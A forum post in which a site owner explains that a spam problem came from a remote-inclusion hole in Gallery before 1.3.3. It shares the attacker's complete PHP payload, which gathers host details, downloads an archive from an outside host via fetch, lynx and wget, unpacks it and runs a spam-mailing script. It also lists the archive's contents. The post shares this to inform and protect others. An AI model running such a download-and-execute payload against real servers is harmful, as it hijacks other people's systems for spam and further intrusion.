use Perl

Thought you guys would find this interesting. I found the source of the spam problem that I was going through twice: a vulnerability in Gallery (versions prior to 1.3.3). You can read my thread to see the technical details, but here's the jist.

Gallery would allow a remote inclusion of another PHP script, which for this spam hack, looked like this:


<?echo "<pre>";

passthru("which perl");
passthru("which dig");
echo "uname ";
passthru("uname -a");
echo "\nhostname ";
passthru("hostname");
echo "\n";

echo $HTTP_HOST.$REQUEST_URI;

passthru("kill -9 `cat /tmp/sess_9e4d0713ad1a561e77c93643bafef7a8`");
passthru("rm -rf /tmp/af56j");
passthru("mkdir /tmp/af56j");
passthru("fetch -o- http://4goofs.com/ad13/archive.tgz > /tmp/af56j/archive1.tgz");
passthru("lynx -dump -source http://4goofs.com/ad13/archive.tgz > /tmp/af56j/archive2.tgz");
passthru("wget http://4goofs.com/ad13/archive.tgz -P /tmp/af56j");
passthru("ls -la/tmp/af56j");
passthru("tar -zxvf /tmp/af56j/archive.tgz -C /tmp/af56j");
passthru("tar -zxvf /tmp/af56j/archive1.tgz -C /tmp/af56j");
passthru("tar -zxvf /tmp/af56j/archive2.tgz -C /tmp/af56j");
passthru("rm -rf /tmp/af56j/archive*");
passthru("chmod 700 /tmp/af56j/formail.pl");
passthru("/tmp/af56j/formail.pl");

passthru("rm -f /tmp/af56j/formail.pl");
passthru("ls -la /tmp/af56j");
?>


Here are the contents of archive2.tgz:


$ tar -tzvf archive2.tgz
-rwxrwxr-x adminsp/games 5044 2003-05-12 05:22 formail.pl
drwxrwxr-x adminsp/games 0 2003-03-02 09:58 lib/
drwxrwxr-x adminsp/games 0 2003-02-01 06:29 lib/Net/
-r--rw-r-- adminsp/games 8762 2003-02-03 05:11 lib/Net/SMTP.pm
-r--rw-r-- adminsp/games 9703 2003-02-03 05:11 lib/Net/Cmd.pm
-r--rw-r-- adminsp/games 3387 2003-02-03 05:11 lib/Net/Config.pm
-rw-r--r-- adminsp/1000 3771 2003-02-03 05:10 lib/ForkManager.pm

Then, here's the formail.pl script (linked to, to keep this post short{er}).

Peace,

Jason